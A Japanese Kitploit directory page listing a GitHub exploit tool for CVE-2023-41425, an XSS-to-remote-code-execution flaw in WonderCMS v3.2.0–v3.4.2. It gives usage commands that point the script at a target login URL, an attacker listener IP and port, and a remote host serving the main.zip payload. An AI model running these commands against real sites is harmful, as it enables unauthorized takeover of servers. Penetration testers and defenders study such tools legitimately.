Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-41425 — WonderCMS RCE CVE-2023-41425 | Kitploit
ツール/GitHubGitHub/twappz/cve-2023-41425
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubtwappz/cve-2023-41425

CVE-2023-41425

WonderCMS RCE CVE-2023-41425

リポジトリを見る
12年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

WonderCMS バージョン v3.2.0 から v3.4.2 向けの RCE

XSS 脆弱性を抱える WonderCMS バージョン v3.2.0 から v3.4.2 では、悪意のある攻撃者が installModule CVE-2023-41425 にコンポーネントをアップロードすることで RCE を達成できます(パスワードを知る必要はありません)。

特徴:

  • CVE-2023-41425 の自動悪用
  • zip のダウンロード元となるリモートホストを簡単に指定可能

使用方法/例

main.zip ファイルのダウンロード元となるリモートホストを指定する場合

root@kitploit:~
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321 -r http://10.10.14.110:8000/main.zip

または main.zip ファイルを指定しない場合。デフォルトでは main.zip からダウンロードします

root@kitploit:~
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321

スクリーンショット

使用例 使用例

🔗 リンク

my website youtube twitter instagram Hack the box

ツールをダウンロード